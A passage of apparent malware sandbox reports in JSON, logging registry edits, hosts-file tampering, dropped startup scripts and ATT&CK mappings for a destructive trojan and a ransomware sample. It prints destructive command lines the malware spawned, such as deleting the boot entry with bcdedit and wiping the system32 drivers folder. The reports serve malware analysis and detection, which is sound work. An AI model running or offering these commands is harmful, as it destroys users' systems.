\"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\LOCAL SETTINGS\\MUICACHE\\137\\52C64B7E\"; Key: \"LANGUAGELIST\"; Value: \"en-US\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-19", "type": 3, "relevance": 10, "name": "Modifies Software Policy Settings", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "17/22 Antivirus vendors marked dropped file \"xlsrvintl.dll\" as malicious (classified as \"Trojan.Filecoder\" with 77% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (UID: 00000000-00005752)\n Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Antivirus2.vbs\"\" (UID: 00000000-00001988)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Antivirus.bat\" \"\" (UID: 00000000-00005672)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005764)\n Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"cmd.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"WScript.exe\"\n \"send@WS2_32.DLL\" in \"cmd.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "api-32", "type": 6, "relevance": 10, "name": "Writes to the hosts file", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" wrote 79 bytes to file \"C:\\Windows\\System32\\drivers\\etc\\hosts\": 3132372e302e302e31207777772e646973636f72642e636f6d203132372e302e302e31207777772e676f6f676c652e636f6d203132372e302e302e31207777772e636c61737369637562652e636f6d", "origin": "API Call", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "api-59", "type": 6, "relevance": 5, "name": "Interacts with the primary disk partition (DR0)", "description": "\"bcdedit.exe\" interacting with \"\\Device\\Harddisk0\\DR0\" using IoControlCode 0x70050", "origin": "API Call", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1
https://hybrid-analysis.com/sample/b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1
Hybrid Analysis - Ransomware
{"size": 150528, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1", "sha256": "b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1", "av_detect": 93, "vx_family": "Trojan.Ransom", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 92, "extracted_files": [{"name": "cbNhUvy60.README.txt", "file_path": "%APPDATA%\\Mozilla\\Firefox\\Crash Reports\\events\\cbNhUvy60.README.txt", "file_size": 1359, "sha256": "e90b96a2653e990a7e32c9cbd427475360f7f1a3a199c1084c7b6f5c522c1e34", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe (PID: 6044)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006044", "name": "b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe", "normalized_path": "C:\\b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe", "sha256": "b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1", "av_label": "Trojan.Ransom", "av_matched": 19, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"CopyFileW\" (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74950000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\a68004154e6a15ae1e7e1128a2f18646\"\n \"Global\\a68004154e6a15ae1e7e1128a2f18646\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", 